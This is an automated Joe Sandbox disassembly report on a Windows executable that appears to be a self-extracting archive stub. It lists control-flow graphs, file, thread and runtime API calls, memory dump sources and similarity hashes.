control_flow_graph 905 41be0a-41be35 call 41cec0 SetEnvironmentVariableW call 40ef07 909 41be3a-41be3e 905->909 910 41be40-41be44 909->910 911 41be62-41be66 909->911 912 41be4d-41be54 call 40effe 910->912 915 41be46-41be4c 912->915 916 41be56-41be5c SetEnvironmentVariableW 912->916 915->912 916->911
APIs
• SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0041BE20
• SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0041BE5C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: EnvironmentVariable
• String ID: sfxcmd$sfxpar
• API String ID: 1431749950-3493335439
• Opcode ID: 3bfbefef404e7699cbae1d00e4de4c91a137c652c6ac0de313e436a493b87561
• Instruction ID: abf7ded109dc203e41e7dd0807d3c4417a3a3dc428eee6c7103a2762917e083f
• Opcode Fuzzy Hash: 3bfbefef404e7699cbae1d00e4de4c91a137c652c6ac0de313e436a493b87561
• Instruction Fuzzy Hash: 43F0A772801325B7CB212F91DC49EE77B98DF18B51F000167FD84A6191D76D9C90DAE9

Control-flow Graph
control_flow_graph 917 40973d-40975e call 41cec0 920 409760-409765 917->920 921 409767 917->921 920->921 922 409769-409786 920->922 921->922 923 409788 922->923 924 40978e-409798 922->924 923->924 925 40979a 924->925 926 40979d-4097c8 CreateFileW 924->926 925->926 927 4097ca-4097ec GetLastError call 40b275 926->927 928 40982c-409841 926->928 934 40981b-409820 927->934 935 4097ee-409810 CreateFileW GetLastError 927->935 929 409843-409856 call 40f10e 928->929 930 40985b-409866 928->930 929->930 934->928 938 409822 934->938 936 409812 935->936 937 409816-409819 935->937 936->937 937->928 937->934 938->928
APIs
• CreateFileW.KERNELBASE(?,?,?,00000000,00000003,-00000001,00000000,?,00000000,?,?,0040777A,?,00000005,?,00000011), ref: 004097BD
• GetLastError.KERNEL32(?,?,0040777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004097CA
• CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,0040777A,?,00000005,?), ref: 004097FF
• GetLastError.KERNEL32(?,?,0040777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00409807
Memory Dump Source
• Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: CreateErrorFileLast
• String ID:
• API String ID: 1214770103-0
• Opcode ID: 8261114be88c5b3f2ef97d17b174653717b7ce123c646ec56b3b2c00c14b5f52
• Instruction ID: 3fdabb0a7b78da84ceac3f8f47fe4e9f24932ea6ab7674d11b3f79e13b02fdf6
• Opcode Fuzzy Hash: 8261114be88c5b3f2ef97d17b174653717b7ce123c646ec56b3b2c00c14b5f52
• Instruction Fuzzy Hash: 553125728403556BD720AB249C45BEBBAA8FB45314F10873AF990973D2D3799C888798

APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00409623
• ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 0040963B
• GetLastError.KERNEL32 ref: 0040966D
• GetLastError.KERNEL32 ref: 0040968C
Memory Dump Source
• Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: ErrorLast$FileHandleRead
• String ID:
• API String ID: 2244327787-0
• Opcode ID: 8731fc9a977f92ccf08b01cd2af6d2610b986f8dad2b35cc9e0e563f25b8a5d6
• Instruction ID: bbb4b0f50a7529cbad656e9548f5b709b5c45d902293de281a1082a135d23292
• Opcode Fuzzy Hash: 8731fc9a977f92ccf08b01cd2af6d2610b986f8dad2b35cc9e0e563f25b8a5d6
• Instruction Fuzzy Hash: 12117930500204EBCF249F61D914A6A77ADEB05325F108A3BF96AA52D2C73F8D40CF5A

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00422213,00000000,00000000,?,00427778,00422213,00000000,00000000,00000000,?,00427975,00000006,FlsSetValue), ref: 00427803
• GetLastError.KERNEL32(?,00427778,00422213,00000000,00000000,00000000,?,00427975,00000006,FlsSetValue,00433768,00433770,00000000,00000364,?,004263F1), ref: 0042780F
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00427778,00422213,00000000,00000000,00000000,?,00427975,00000006,FlsSetValue,00433768,00433770,00000000), ref: 0042781D
Memory Dump Source
• Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: c527a256b247d6777ed83341c2626d2ef873b2c902c7436f8a9ce18f17210d91
• Instruction ID: 6112c2a97fa356c19f856f24aac32a2f37511f4e956d4714b3356372d3b39a9b
• Opcode Fuzzy Hash: c527a256b247d6777ed83341c2626d2ef873b2c902c7436f8a9ce18f17210d91
• Instruction Fuzzy Hash: 8D01F7327492339BC7315B68BC5CE6B7B98AF047B1B501631FA06D7240DB64D801C6E8

APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0041992F
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00419940
• TranslateMessage.USER32(?), ref: 0041994A
• DispatchMessageW.USER32(?), ref: 00419954
Memory Dump Source
• Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Message$DispatchPeekTranslate
• String ID:
• API String ID: 4217535847-0
• Opcode ID: 73ffccd032eef0fd2ec0bf37a87d61bc5d9cad1bb058dfefe12293e0bee7da70
• Instruction ID: ca84477f8bf453471b1145135bafbf80a035e73605b743e173faee0e530019ce
• Opcode Fuzzy Hash: 73ffccd032eef0fd2ec0bf37a87d61bc5d9cad1bb058dfefe12293e0bee7da70
• Instruction Fuzzy Hash: DDE0ED72C4212EA78B20EBE6AC4CCDBBF6CEE062657004026B559D2000D6689515C7F5

APIs
• CreateThread.KERNELBASE(00000000,00010000,Function_0000FD61,?,00000000,00000000), ref: 0040FBD5
• SetThreadPriority.KERNEL32(?,00000000), ref: 0040FC1C
  • Part of subcall function 00406DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00406DF1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Thread$CreatePriority__vswprintf_c_l
• String ID: CreateThread failed
• API String ID: 2655393344-3849766595
• Opcode ID: e935c46ae4045b79a95f29bfd48e930c95a099d85882b9846901c17ace30c5d5
• Instruction ID: fe4af42ff490de6eaf0a4fb41acade12e47c471936cda400ac1cfdc0f0de809f
• Opcode Fuzzy Hash: e935c46ae4045b79a95f29bfd48e930c95a099d85882b9846901c17ace30c5d5
• Instruction Fuzzy Hash: 8901F7723083096BE2346B68AC83F67B769FB44711F20043FF942B51C0CAB56845876C
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(000000F5,?,?,0040C853,00000001,?,?,?,00000000,0041420B,?,?,?,?,?,00413CB0), ref: 00409BE3
                                                                                      • WriteFile.KERNEL32(?,00000000,?,00413EB8,00000000,?,?,00000000,0041420B,?,?,?,?,?,00413CB0,?), ref: 00409C23
                                                                                      • WriteFile.KERNELBASE(?,00000000,?,00413EB8,00000000,?,00000001,?,?,0040C853,00000001,?,?,?,00000000,0041420B), ref: 00409C50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite$Handle
                                                                                      • String ID:
                                                                                      • API String ID: 4209713984-0
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00409D92,?,00000001,00000000,?,?), ref: 00409EAD
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00409D92,?,00000001,00000000,?,?), ref: 00409EE0
                                                                                      • GetLastError.KERNEL32(?,?,?,?,00409D92,?,00000001,00000000,?,?), ref: 00409EFD
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 2485089472-0
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID: CMT
                                                                                      • API String ID: 3519838083-2756464174
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 004282E8
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Info
                                                                                      • String ID:
                                                                                      • API String ID: 1807457897-3916222277
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00401DA6
                                                                                        • Part of subcall function 00403AA3: __EH_prolog.LIBCMT ref: 00403AA8
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID: CMT
                                                                                      • API String ID: 3519838083-2756464174
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID: CMT
                                                                                      • API String ID: 3519838083-2756464174
                                                                                      APIs
                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,F5E85006,00000001,?,000000FF), ref: 00427A7A
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: String
                                                                                      • String ID: LCMapStringEx
                                                                                      • API String ID: 2568140703-3893581201
                                                                                      APIs
                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0042709A), ref: 004279F2
                                                                                      Strings
                                                                                      • InitializeCriticalSectionEx, xrefs: 004279C2
                                                                                      Similarity
                                                                                      • API ID: CountCriticalInitializeSectionSpin
                                                                                      • String ID: InitializeCriticalSectionEx
                                                                                      • API String ID: 2593887523-3084827643
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Alloc
                                                                                      • String ID: FlsAlloc
                                                                                      • API String ID: 2773662609-671089009
                                                                                      APIs
                                                                                      • try_get_function.LIBVCRUNTIME ref: 00421DAF
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: try_get_function
                                                                                      • String ID: FlsAlloc
                                                                                      • API String ID: 2742660187-671089009
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041CD6E
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID: 3Ro
                                                                                      • API String ID: 1269201914-1492261280
                                                                                      APIs
                                                                                        • Part of subcall function 004281EB: GetOEMCP.KERNEL32(00000000,?,?,00428474,?), ref: 00428216
                                                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,004284B9,?,00000000), ref: 0042868C
                                                                                      • GetCPInfo.KERNEL32(00000000,004284B9,?,?,?,004284B9,?,00000000), ref: 0042869F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CodeInfoPageValid
                                                                                      • String ID:
                                                                                      • API String ID: 546120528-0
                                                                                      • Opcode ID: 521ab901f950d0ad3fe6016d97a73dc84600e0179c0298e482f5db38df764ef9
                                                                                      • Instruction ID: b593d52b643ea4c8af91f0efabc80aa044d7a574b7381ae310c12d2c6674fa9f
                                                                                      • Opcode Fuzzy Hash: 521ab901f950d0ad3fe6016d97a73dc84600e0179c0298e482f5db38df764ef9
                                                                                      • Instruction Fuzzy Hash: 3D515770B012258EDB208F35EC806BFBBE5EF91314FA4406FD4868B252DE3D9546CB99
                                                                                      APIs
                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00412112
                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00412135
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw
                                                                                      • String ID:
                                                                                      • API String ID: 2005118841-0
                                                                                      • Opcode ID: 32f50b0cc4320dbc24f51e69371e2a6e0b8adfbe26712daf94315a6270467dc7
                                                                                      • Instruction ID: c58466310614fca9e19c29aeea194c597ac6d636f9f729dc037dc741f17c39bc
                                                                                      • Opcode Fuzzy Hash: 32f50b0cc4320dbc24f51e69371e2a6e0b8adfbe26712daf94315a6270467dc7
                                                                                      • Instruction Fuzzy Hash: 3241F6B46093826FD328DF34E58479AFBD4BB58308F00061FE75897242D7B99498C79E
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00401383
                                                                                        • Part of subcall function 00405FB1: __EH_prolog.LIBCMT ref: 00405FB6
                                                                                        • Part of subcall function 0040C413: __EH_prolog.LIBCMT ref: 0040C418
                                                                                        • Part of subcall function 0040C413: new.LIBCMT ref: 0040C45B
                                                                                        • Part of subcall function 0040C413: new.LIBCMT ref: 0040C47F
                                                                                      • new.LIBCMT ref: 004013FB
                                                                                        • Part of subcall function 0040AC66: __EH_prolog.LIBCMT ref: 0040AC6B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 8d6764d0f256593f89a47f954b42ba740364bf9215fa9a53a0dc4a9a12e62ddd
                                                                                      • Instruction ID: 7d16d70ecb14e8e79e7b5dd1dd8a15287db09388ee78924138016be20b037bb4
                                                                                      • Opcode Fuzzy Hash: 8d6764d0f256593f89a47f954b42ba740364bf9215fa9a53a0dc4a9a12e62ddd
                                                                                      • Instruction Fuzzy Hash: 1C4145B0805B409ED720CF7A88859E7FBE5FB18304F404A2ED5EE97292CB366554CB19
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00401383
                                                                                        • Part of subcall function 00405FB1: __EH_prolog.LIBCMT ref: 00405FB6
                                                                                        • Part of subcall function 0040C413: __EH_prolog.LIBCMT ref: 0040C418
                                                                                        • Part of subcall function 0040C413: new.LIBCMT ref: 0040C45B
                                                                                        • Part of subcall function 0040C413: new.LIBCMT ref: 0040C47F
                                                                                      • new.LIBCMT ref: 004013FB
                                                                                        • Part of subcall function 0040AC66: __EH_prolog.LIBCMT ref: 0040AC6B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 82088425750a8f9786327660511d47626212b708da617ec15fd77a91959e708f
                                                                                      • Instruction ID: 967923b4f97704c4c437def08d8f66e870f0ef7ca6390e0d87ac0a602a2cf95d
                                                                                      • Opcode Fuzzy Hash: 82088425750a8f9786327660511d47626212b708da617ec15fd77a91959e708f
                                                                                      • Instruction Fuzzy Hash: BC4136B0805B409ED720DF7A88859E7FAE5FF18304F404A2ED5EE97282CB366554CB19
                                                                                      APIs
                                                                                        • Part of subcall function 0042631F: GetLastError.KERNEL32(?,0043CBE8,00422674,0043CBE8,?,?,00422213,?,?,0043CBE8), ref: 00426323
                                                                                        • Part of subcall function 0042631F: _free.LIBCMT ref: 00426356
                                                                                        • Part of subcall function 0042631F: SetLastError.KERNEL32(00000000,?,0043CBE8), ref: 00426397
                                                                                        • Part of subcall function 0042631F: _abort.LIBCMT ref: 0042639D
                                                                                        • Part of subcall function 00428576: _abort.LIBCMT ref: 004285A8
                                                                                        • Part of subcall function 00428576: _free.LIBCMT ref: 004285DC
                                                                                        • Part of subcall function 004281EB: GetOEMCP.KERNEL32(00000000,?,?,00428474,?), ref: 00428216
                                                                                      • _free.LIBCMT ref: 004284CF
                                                                                      • _free.LIBCMT ref: 00428505
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorLast_abort
                                                                                      • String ID:
                                                                                      • API String ID: 2991157371-0
                                                                                      • Opcode ID: afc9614456cfdb25e5022f3842ae9cb1b6591ab00423bea9d9e7a77255d90ffe
                                                                                      • Instruction ID: 58e3e3796717311407861f67048789d47ee7981e6c8d01153a8da9ba05f48a85
                                                                                      • Opcode Fuzzy Hash: afc9614456cfdb25e5022f3842ae9cb1b6591ab00423bea9d9e7a77255d90ffe
                                                                                      • Instruction Fuzzy Hash: 6131E431A01229AFDB10EF69E440B6E77F4EF44324FA5419FE8049B291EF399D41CB18
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00409B87,?,?,00407735), ref: 00409579
                                                                                      • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00409B87,?,?,00407735), ref: 004095AE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 0e36de1b61f0975f91e02c29b2129f7af44ae16e47bc85d055bd7b26c96cdd2f
                                                                                      • Instruction ID: 0beaafe9c38a62959d6171c6487471c4c240d38af4d97670f7e3b2be9b64cbd5
                                                                                      • Opcode Fuzzy Hash: 0e36de1b61f0975f91e02c29b2129f7af44ae16e47bc85d055bd7b26c96cdd2f
                                                                                      • Instruction Fuzzy Hash: AE21E6B2004748AFD7318F15CC45BA777E8EB49368F00493EF4D5A26D2C378AD498A65
                                                                                      APIs
                                                                                      • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,00407436,?,?,?), ref: 00409A2C
                                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00409ADC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$BuffersFlushTime
                                                                                      • String ID:
                                                                                      • API String ID: 1392018926-0
                                                                                      • Opcode ID: 906d0a5fc383f78abd24a4b3cb5b37a5542226229cbed73a0d4e19191dc04917
                                                                                      • Instruction ID: 6cd6c925dbd7e52991087b31e057faa7a140176950c7cae40238e0bac7945fde
                                                                                      • Opcode Fuzzy Hash: 906d0a5fc383f78abd24a4b3cb5b37a5542226229cbed73a0d4e19191dc04917
                                                                                      • Instruction Fuzzy Hash: D021E431248281AFC714DE24D891AABBBD4AB96704F04493EB891972C2D73DED0CCB55
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00427795
                                                                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004277A2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc__crt_fast_encode_pointer
                                                                                      • String ID:
                                                                                      • API String ID: 2279764990-0
                                                                                      • Opcode ID: d7a21d642bd9fba804c342f6586c16827edd9987b228dd58e17cddbd2b5c10e1
                                                                                      • Instruction ID: 41470a1e1533a0a35c43a41616af966ac3a9afd39fb21163fc90f9974bc324e7
                                                                                      • Opcode Fuzzy Hash: d7a21d642bd9fba804c342f6586c16827edd9987b228dd58e17cddbd2b5c10e1
                                                                                      • Instruction Fuzzy Hash: 6C11E337B042319B9F259E29FC8095B7395ABC4720B560232FD14AB354D639FC4286D9
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00409B21
                                                                                      • GetLastError.KERNEL32 ref: 00409B2D
                                                                                      Memory Dump Source
